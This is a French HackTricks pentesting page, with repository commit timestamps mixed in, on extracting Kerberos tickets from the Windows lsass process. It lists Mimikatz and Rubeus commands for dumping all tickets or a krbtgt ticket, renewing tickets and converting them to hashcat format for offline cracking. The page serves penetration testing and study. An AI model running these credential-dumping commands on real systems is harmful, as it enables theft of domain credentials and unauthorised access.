hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md

49 lines
3.3 KiB
Markdown
Raw Normal View History

# Récolte de tickets depuis Windows
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
Autres façons de soutenir HackTricks :
2022-04-28 16:01:33 +00:00
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
Les tickets dans Windows sont gérés et stockés par le processus **lsass** (Local Security Authority Subsystem Service), responsable de la gestion des politiques de sécurité. Pour extraire ces tickets, il est nécessaire d'interagir avec le processus lsass. Un utilisateur non administratif ne peut accéder qu'à ses propres tickets, tandis qu'un administrateur a le privilège d'extraire tous les tickets du système. Pour de telles opérations, les outils **Mimikatz** et **Rubeus** sont largement utilisés, offrant chacun des commandes et des fonctionnalités différentes.
### Mimikatz
Mimikatz est un outil polyvalent qui peut interagir avec la sécurité de Windows. Il est utilisé non seulement pour extraire des tickets, mais aussi pour diverses autres opérations liées à la sécurité.
2022-08-13 23:06:40 +00:00
```bash
# Extracting tickets using Mimikatz
2022-08-13 23:06:40 +00:00
sekurlsa::tickets /export
```
### Rubeus
Rubeus est un outil spécifiquement conçu pour l'interaction et la manipulation de Kerberos. Il est utilisé pour l'extraction et la gestion des tickets, ainsi que pour d'autres activités liées à Kerberos.
```bash
# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Listing all tickets
2022-08-13 23:06:40 +00:00
.\Rubeus.exe triage
# Dumping a specific ticket by LUID
2022-08-13 23:06:40 +00:00
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>
# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>
2022-08-13 23:06:40 +00:00
```
Lors de l'utilisation de ces commandes, assurez-vous de remplacer les espaces réservés tels que `<BASE64_TICKET>` et `<luid>` par le ticket encodé en Base64 et l'ID de connexion respectivement. Ces outils offrent une fonctionnalité étendue pour gérer les tickets et interagir avec les mécanismes de sécurité de Windows.
## Références
* **[https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)**